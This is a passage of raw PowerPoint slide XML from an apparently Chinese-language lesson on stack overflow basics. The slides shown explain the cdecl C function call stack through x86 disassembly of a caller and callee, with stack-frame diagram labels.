            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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73" name="Shape 373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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74" name="Shape 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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75" name="Shape 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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76" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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77" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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78" name="Shape 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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79" name="Shape 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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380" name="Shape 380"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="381" name="Shape 381"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%esp, %ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="382" name="Shape 382"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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84" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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85" name="Shape 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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86" name="Shape 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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return address (callee)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87" name="Shape 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="385" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5089200" y="5052133"/>
            <a:ext cx="2857200" cy="25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389" name="Shape 389"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="384" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5098800" y="4642533"/>
            <a:ext cx="2847600" cy="860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390" name="Shape 390"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5146000" y="4232933"/>
            <a:ext cx="2800400" cy="1665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triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5719700" y="5581133"/>
            <a:ext cx="1768400" cy="3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333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%eax = 1 + 2 + 3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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392" name="Shape 392"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-144115" y="6123185"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Shape 393"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="394" name="Shape 394"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1639E95B-D823-4D1E-A908-2535B7EDDD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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94D83108-997F-46B2-A663-AE00D822B566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 400"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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01" name="Shape 401"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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02" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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03" name="Shape 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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int ret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04" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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05" name="Shape 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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06" name="Shape 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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07" name="Shape 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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408" name="Shape 408"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5479908"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Shape 409"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="410" name="Shape 410"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Shape 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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3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12" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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2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13" name="Shape 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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1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14" name="Shape 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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return address (callee)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15" name="Shape 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Shape 417"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="418" name="Shape 418"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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419" name="Shape 419"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="6328548"/>
            <a:ext cx="1501600" cy="365600"/>
